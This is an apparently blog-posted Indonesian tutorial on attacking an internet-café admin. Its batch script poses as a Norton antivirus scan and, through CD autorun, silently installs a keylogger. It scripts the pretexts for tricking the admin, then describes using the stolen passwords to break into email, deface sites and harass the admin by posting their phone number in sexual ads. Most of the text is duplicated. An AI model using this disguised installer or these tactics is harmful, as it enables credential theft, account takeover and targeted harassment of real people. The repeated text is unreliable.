|---[Table of
Contents
1. Introduction
2. Serangan pertama
3. Serangan kedua
4. Hari pembalasan
5. Cara pencegahan
6. Penutup
1. Introduction
Semakin paranoidnya para admin belakangan ini menyebabkan banyak pengguan jasa
layanan internet cafe (warnet) menjadi kurang nyaman. Restriction (pembatasan)
disana-sini (walaupun semua itu dilakukan bukan tanpa alasan) menjadi salah
satu inspirasi bagi banyak orang untuk mencari-cari cara menerobos segala
keterbatasan itu dan saling men-share pengetahuan mereka. Berbagai jenis
exploit pun dibedah, didiskusikan dan dikemas menjadi artikel untuk para
newbie.
Sejenak para newbie bisa tertawa puas, berjaya, senyum-senyum sendiri sampai
tak jarang lupa diri :P Namun semua itu tentunya tidak bertahan lama. Admin
menjadi semakn pintar. Fasilitas Floppy drive dan CD room drive dihapus dan
melarang user untuk melakukan segala bentuk transfer file dari media
penyimpanan sementara (disket, cd, flashdisk) kecuali melalui server terlebih
dahulu. Ini merupakan fenomena yang akhir-akhir ini bisa kita temui dengan
mudah di berbagai Internet cafe. Admin mulai rajin mengupdate patch sehingga
exploit-exploit yang dulu dibangga-banggakan oleh kaum newbie menjadi"rongsokan"
1. Introduction
2. Serangan pertama
3. Serangan kedua
4. Hari pembalasan
5. Cara pencegahan
6. Penutup
1. Introduction
Semakin paranoidnya para admin belakangan ini menyebabkan banyak pengguan jasa
layanan internet cafe (warnet) menjadi kurang nyaman. Restriction (pembatasan)
disana-sini (walaupun semua itu dilakukan bukan tanpa alasan) menjadi salah
satu inspirasi bagi banyak orang untuk mencari-cari cara menerobos segala
keterbatasan itu dan saling men-share pengetahuan mereka. Berbagai jenis
exploit pun dibedah, didiskusikan dan dikemas menjadi artikel untuk para
newbie.
Sejenak para newbie bisa tertawa puas, berjaya, senyum-senyum sendiri sampai
tak jarang lupa diri :P Namun semua itu tentunya tidak bertahan lama. Admin
menjadi semakn pintar. Fasilitas Floppy drive dan CD room drive dihapus dan
melarang user untuk melakukan segala bentuk transfer file dari media
penyimpanan sementara (disket, cd, flashdisk) kecuali melalui server terlebih
dahulu. Ini merupakan fenomena yang akhir-akhir ini bisa kita temui dengan
mudah di berbagai Internet cafe. Admin mulai rajin mengupdate patch sehingga
exploit-exploit yang dulu dibangga-banggakan oleh kaum newbie menjadi"rongsokan"
tak berguna.
Sekarang, mari kita bangunkan sang admin dari mimpi indahnya untuk menunjukkan
bahwa menjadi paranoid itu adakalanya tidak baik dan tidak ada system yang
100% secure.
2. Serangan pertama
Kita akan menjadi seorang "agen mata-mata" (hehehe.. gw pake istilah ini biar
ente merasa agak sedikit keren) yang akan merekam segala aktivitas sang admin.
Tujuannya.. banyak! dan salah satunya seperti hal yang banyak diinginkan
orang... mendapatkan password sang admin. Partner kita kali ini adalah
navw32.exe, sebuah keyloger dengan icon Norton AntiVirus yang bisa kamu
dapatkan suka-suka dengan harga cuma-cuma di halaman member www.spyrozone.net
kategori Keyloger. Setelah kamu download keyloger tersebut, ikuti langkah -
langkah berikut:
---[1 Bukalah Notepad kemudian ketik baris script berikut:
[autorun]
open=nav.bat
Klik [file][save] kemudian pada box save as type, pilih All Files dan pada
form isian name beri nama Autorun.inf lalu klik tombol [save].
---[2 Buka lembar baru pada notepad dengan klik menu [file] [new] lalu ketik
script berikut:
@echo off
echo Norton Antivirus 2006
echo Scanning disk drive...
echo Please wait...
copy navw32.exe %windir%\navw32.exe
call %windir%\navw32.exe
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo. Scanning complette! No virus threat detected!
echo.
cls
Klik [file][save] kemudian pada box save as type, pilih All Files dan pada
form isian name beri nama nav.bat lalu klik tombol [save].
---[3. Persiapkan beberapa file microsoft word documents (bisa diganti dengan
file lain) sebagai tipuan/alasan untuk di transfer. Semakin banyak file,
semakin baik karena file keyloger kamu akan semakin tersamarkan.
---[4. Persiapkan sebuah cd kosong (bekas juga boleh) lalu bakar semua file
diatas (autorun.inf, nav.bat, navw32.exe dan file-file tipuan) kedalam CD.
Sekarang pergilah ke warnet tempat sang admin berkuasa. Bersikaplah seperti
biasa dan jangan gugup selayaknya para koruptor yang sering nampang di
satasion-stasion TI-PI tanpa rasa malu. Setelah kamu login ke billing komputer
user, datangi sang admin. Katakan pada beliau, "Mas/mbak/om/tante/, mau
transfer file dari cd ini. Nama filenya blablabla tolong dikirim ke komputer
nomor blablabla."
Begitu CD dimasukkan, saat itulah terjadi sebuah fenomena berikut:
Komputer akan memproses file autorun.inf secara otomatis ---> file autorun.inf
akan memproses file nav.bat ---> file nav.bat akan menduplikasi file
navw32.exe ke dalam directory windows dan mengaktivkannya ---> Keyloger telah
terinstall, hasil rekamannya akan tersimpan di directory yang sama dengan nama
navw32.dll beratribut hidden.
Perlu diketahui bahwa keyloger ini tidak akan menampilkan kotak dialog dalam
bentuk apapun! So, nggak usah khawatir bakal ketahuan ;)
Sekarang, kamu bisa pulang dengan wajah tanpa dosa dan mungkin (lagi - lagi)
kamu bakalan senyum-senyum sendiri sambil mengelus-elus jenggot kayak habis
menang togel.
Lalu bagaimana cara mengambil file hasil rekaman keyloger di directory windows
sang admin? Ikuti langkah-langkah pada serangan kedua.
3. Serangan kedua
Dua hari Kemudian, datanglah ke warnet itu lagi. Bertingkahlakulah secara
wajar dan beraktivitas seperti layaknya user biasa. Setelah selesai
berinternet ria, datangi sang admin, bayarlah biaya browsing seperti biasa
lalu dengan wajah sangat-sangat memelas seperti pengemis di jalanan :) katakan
pada beliau,"Mas/mbak/om/tante/, komputer saya bermasalah neeh. Menurut pesan
Error yang muncul, file navw32.dll yang berada di directory windows hilang.
File tersebut beratribut hidden. Tolong doong copykan dari komputer ini.
Kebetulan versi windowsnya sama dengan komputer saya.."
Tentu saja biasanya sang admin dengan sangat senang hati akan membantu kamu.
Dengan suka rela dan penuh kesadaran beliau akan mengaktifkan opsi Show All
files pada Folder Options dan mengcopy-kan file navw32.dll dari directory
windows tanpa menyadari bahwa file tersebut bukan file system, namun file
hasil rekaman keyloger.
Berikan disket/cd/flashdisk mu dan setelah file tersebut tersimpan, ucapkan
beribu terima kasih lalu pulanglah ke rumah. Buka file tersebut di rumah. Klik
2x pada file lalu ketika muncul kotak dialog open with, klik opsi select
program from a list dan pilih notepad pada daftar program yang ditampilkan.
Sekarang tentunya kamu bisa leluasa membaca rekaman aktivitas sang admin. Cari
password emailnya dan kamu bisa menuju pada hari pembalasan.
4. Hari Pembalasan
Pilih hari yang tepat, misalnya malam jum'at kliwon dimana sang admin mungkin
sedang terlelap di rumahnya. Nyalakan komputermu dan connectlah ke Internet.
Namun ada baiknya kamu lakukan hal ini di warnet agar lebih aman. Carilah
warnet yang buka 24 jam.
Berbekal hasil rekaman keyloger tadi, loginlah ke account email sang admin.
Setelah puas menjelajahi emailnya, subscriblah ke berbagai mailing list besar
dengan email tersebut. Subscribe sebanyak-banyaknya.
Hohoho.. lalu apa lagi nich?? Kalau sang admin punya blog/website pribadi/
account Friendster.. tentu kamu dengan mudah mendapatkan semua password itu
dengan fasilitas forgot password. Kebanyakan penyedia layanan seperti itu akan
mengirimkan password via email. So, setelah dapat semuanya... heheh... DEFACE
ajah ;) Tapi inget lho, halaman lama harus tetap di backup dan jangan merubah
password apapun!!
Ada ide yang sedikit lebih sadis (ini cuma ide lho.. sebaiknya jangan
dilakukan deech..). Daftarkan emailnya ke berbagai situs - situs porno dan
postinglah sebuah pesan singkat, memikat dan "mematikan". Berikut contohnya
jika milis tersebut berbahasa Indonesia:
Dear all..
gwe lagi nafsu berat neeh, burun telepon gwe doong sekarang juga!! neeh no
telp gwe: 021-blablabla (masukkan no telp sang admin)
gwe tunggu 24 jam lho!!
Atau terserah kamu laah.. saya rasa kamu lebih pintar dalam memilih kata- kata
yang yahuud!! ;D
Maka bisa dipastikan malam itu akan menjadi malam jumat kliwon paling
mengerikan bagi sang admin, lebih mengerikan daripada film-film horor manapun!
Telepon rumahnya akan berdering tanpa henti dibanjiri oleh telepon dari dalam
dan luar negeri dengan maksud pembicaraan yang sudah bisa ditebak apa
maksudnya ;D
Keesokan harinya, setelah menghadapi malam paling mengerikan itu, sang admin
akan kaget 1/2 hidup 1/2 mati mendapati inboxnya penuh dengan email-email dari
berbagai milis yang beliau sendiri tidak merasa pernah bergabung dengan
milis-milis itu. Dan bisa jadi, saat beliau sedang sibuk Unsubcribe dari
milis-milis tersebut, telepon rumahnya masih terus - terusan menjerit - jerit
dengan jeritan indah :D
5. Pencegahan
Jika kamu adalah admin yang tidak mau mengalami nasib seperti diatas, maka
setiap kamu menerima CD dari siapapun..
1. Buka windows explorer
2. Tekan-tahan tombol shift sambil memasukkan CD kedalam CD Room dRive.
3. Setelah CD masuk,tetap tekan tombol shift sampai kira-kira 25 detik.Setelah
itu kamu bisa melepas tombol shift dan mengaksesnya melalui panel sebelah kiri
windows Explorer. Klik pada area folder tree, jangan pada daftar drive sebelah
kanan karena fitur autorun akan aktif.
Dan ingat, jangan terlalu percaya pada siapapun! Ada begitu banyak orang tidak
terduga di sekitar anda!!
6. Penutup
---[+ Kesimpulan
Bisa kita bayangkan sendiri betapa kelalaian sepele bisa menimbulkan dampak
yang sangat berbahaya. Ini hanya merupakan contoh Social Engineering sederhana
namun dampaknya.. bisa anda bayangkan sendiri ;)
Cara diatas sudah saya coba pada 4 buah warnet di sidoarjo dan hasilnya saya
berhasil mendapatkan catatan aktivitas sang admin (password etc..). Tapi untuk
penerapan "PEMBALASAN" tentu saya tidak melakukan hal sekejam itu ;P
Sekarang, mari kita bangunkan sang admin dari mimpi indahnya untuk menunjukkan
bahwa menjadi paranoid itu adakalanya tidak baik dan tidak ada system yang
100% secure.
2. Serangan pertama
Kita akan menjadi seorang "agen mata-mata" (hehehe.. gw pake istilah ini biar
ente merasa agak sedikit keren) yang akan merekam segala aktivitas sang admin.
Tujuannya.. banyak! dan salah satunya seperti hal yang banyak diinginkan
orang... mendapatkan password sang admin. Partner kita kali ini adalah
navw32.exe, sebuah keyloger dengan icon Norton AntiVirus yang bisa kamu
dapatkan suka-suka dengan harga cuma-cuma di halaman member www.spyrozone.net
kategori Keyloger. Setelah kamu download keyloger tersebut, ikuti langkah -
langkah berikut:
---[1 Bukalah Notepad kemudian ketik baris script berikut:
[autorun]
open=nav.bat
Klik [file][save] kemudian pada box save as type, pilih All Files dan pada
form isian name beri nama Autorun.inf lalu klik tombol [save].
---[2 Buka lembar baru pada notepad dengan klik menu [file] [new] lalu ketik
script berikut:
@echo off
echo Norton Antivirus 2006
echo Scanning disk drive...
echo Please wait...
copy navw32.exe %windir%\navw32.exe
call %windir%\navw32.exe
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo. Scanning complette! No virus threat detected!
echo.
cls
Klik [file][save] kemudian pada box save as type, pilih All Files dan pada
form isian name beri nama nav.bat lalu klik tombol [save].
---[3. Persiapkan beberapa file microsoft word documents (bisa diganti dengan
file lain) sebagai tipuan/alasan untuk di transfer. Semakin banyak file,
semakin baik karena file keyloger kamu akan semakin tersamarkan.
---[4. Persiapkan sebuah cd kosong (bekas juga boleh) lalu bakar semua file
diatas (autorun.inf, nav.bat, navw32.exe dan file-file tipuan) kedalam CD.
Sekarang pergilah ke warnet tempat sang admin berkuasa. Bersikaplah seperti
biasa dan jangan gugup selayaknya para koruptor yang sering nampang di
satasion-stasion TI-PI tanpa rasa malu. Setelah kamu login ke billing komputer
user, datangi sang admin. Katakan pada beliau, "Mas/mbak/om/tante/, mau
transfer file dari cd ini. Nama filenya blablabla tolong dikirim ke komputer
nomor blablabla."
Begitu CD dimasukkan, saat itulah terjadi sebuah fenomena berikut:
Komputer akan memproses file autorun.inf secara otomatis ---> file autorun.inf
akan memproses file nav.bat ---> file nav.bat akan menduplikasi file
navw32.exe ke dalam directory windows dan mengaktivkannya ---> Keyloger telah
terinstall, hasil rekamannya akan tersimpan di directory yang sama dengan nama
navw32.dll beratribut hidden.
Perlu diketahui bahwa keyloger ini tidak akan menampilkan kotak dialog dalam
bentuk apapun! So, nggak usah khawatir bakal ketahuan ;)
Sekarang, kamu bisa pulang dengan wajah tanpa dosa dan mungkin (lagi - lagi)
kamu bakalan senyum-senyum sendiri sambil mengelus-elus jenggot kayak habis
menang togel.
Lalu bagaimana cara mengambil file hasil rekaman keyloger di directory windows
sang admin? Ikuti langkah-langkah pada serangan kedua.
3. Serangan kedua
Dua hari Kemudian, datanglah ke warnet itu lagi. Bertingkahlakulah secara
wajar dan beraktivitas seperti layaknya user biasa. Setelah selesai
berinternet ria, datangi sang admin, bayarlah biaya browsing seperti biasa
lalu dengan wajah sangat-sangat memelas seperti pengemis di jalanan :) katakan
pada beliau,"Mas/mbak/om/tante/, komputer saya bermasalah neeh. Menurut pesan
Error yang muncul, file navw32.dll yang berada di directory windows hilang.
File tersebut beratribut hidden. Tolong doong copykan dari komputer ini.
Kebetulan versi windowsnya sama dengan komputer saya.."
Tentu saja biasanya sang admin dengan sangat senang hati akan membantu kamu.
Dengan suka rela dan penuh kesadaran beliau akan mengaktifkan opsi Show All
files pada Folder Options dan mengcopy-kan file navw32.dll dari directory
windows tanpa menyadari bahwa file tersebut bukan file system, namun file
hasil rekaman keyloger.
Berikan disket/cd/flashdisk mu dan setelah file tersebut tersimpan, ucapkan
beribu terima kasih lalu pulanglah ke rumah. Buka file tersebut di rumah. Klik
2x pada file lalu ketika muncul kotak dialog open with, klik opsi select
program from a list dan pilih notepad pada daftar program yang ditampilkan.
Sekarang tentunya kamu bisa leluasa membaca rekaman aktivitas sang admin. Cari
password emailnya dan kamu bisa menuju pada hari pembalasan.
4. Hari Pembalasan
Pilih hari yang tepat, misalnya malam jum'at kliwon dimana sang admin mungkin
sedang terlelap di rumahnya. Nyalakan komputermu dan connectlah ke Internet.
Namun ada baiknya kamu lakukan hal ini di warnet agar lebih aman. Carilah
warnet yang buka 24 jam.
Berbekal hasil rekaman keyloger tadi, loginlah ke account email sang admin.
Setelah puas menjelajahi emailnya, subscriblah ke berbagai mailing list besar
dengan email tersebut. Subscribe sebanyak-banyaknya.
Hohoho.. lalu apa lagi nich?? Kalau sang admin punya blog/website pribadi/
account Friendster.. tentu kamu dengan mudah mendapatkan semua password itu
dengan fasilitas forgot password. Kebanyakan penyedia layanan seperti itu akan
mengirimkan password via email. So, setelah dapat semuanya... heheh... DEFACE
ajah ;) Tapi inget lho, halaman lama harus tetap di backup dan jangan merubah
password apapun!!
Ada ide yang sedikit lebih sadis (ini cuma ide lho.. sebaiknya jangan
dilakukan deech..). Daftarkan emailnya ke berbagai situs - situs porno dan
postinglah sebuah pesan singkat, memikat dan "mematikan". Berikut contohnya
jika milis tersebut berbahasa Indonesia:
Dear all..
gwe lagi nafsu berat neeh, burun telepon gwe doong sekarang juga!! neeh no
telp gwe: 021-blablabla (masukkan no telp sang admin)
gwe tunggu 24 jam lho!!
Atau terserah kamu laah.. saya rasa kamu lebih pintar dalam memilih kata- kata
yang yahuud!! ;D
Maka bisa dipastikan malam itu akan menjadi malam jumat kliwon paling
mengerikan bagi sang admin, lebih mengerikan daripada film-film horor manapun!
Telepon rumahnya akan berdering tanpa henti dibanjiri oleh telepon dari dalam
dan luar negeri dengan maksud pembicaraan yang sudah bisa ditebak apa
maksudnya ;D
Keesokan harinya, setelah menghadapi malam paling mengerikan itu, sang admin
akan kaget 1/2 hidup 1/2 mati mendapati inboxnya penuh dengan email-email dari
berbagai milis yang beliau sendiri tidak merasa pernah bergabung dengan
milis-milis itu. Dan bisa jadi, saat beliau sedang sibuk Unsubcribe dari
milis-milis tersebut, telepon rumahnya masih terus - terusan menjerit - jerit
dengan jeritan indah :D
5. Pencegahan
Jika kamu adalah admin yang tidak mau mengalami nasib seperti diatas, maka
setiap kamu menerima CD dari siapapun..
1. Buka windows explorer
2. Tekan-tahan tombol shift sambil memasukkan CD kedalam CD Room dRive.
3. Setelah CD masuk,tetap tekan tombol shift sampai kira-kira 25 detik.Setelah
itu kamu bisa melepas tombol shift dan mengaksesnya melalui panel sebelah kiri
windows Explorer. Klik pada area folder tree, jangan pada daftar drive sebelah
kanan karena fitur autorun akan aktif.
Dan ingat, jangan terlalu percaya pada siapapun! Ada begitu banyak orang tidak
terduga di sekitar anda!!
6. Penutup
---[+ Kesimpulan
Bisa kita bayangkan sendiri betapa kelalaian sepele bisa menimbulkan dampak
yang sangat berbahaya. Ini hanya merupakan contoh Social Engineering sederhana
namun dampaknya.. bisa anda bayangkan sendiri ;)
Cara diatas sudah saya coba pada 4 buah warnet di sidoarjo dan hasilnya saya
berhasil mendapatkan catatan aktivitas sang admin (password etc..). Tapi untuk
penerapan "PEMBALASAN" tentu saya tidak melakukan hal sekejam itu ;P
/* ------------------------------|EOF|------------------------------ */
Tidak ada komentar:
Posting Komentar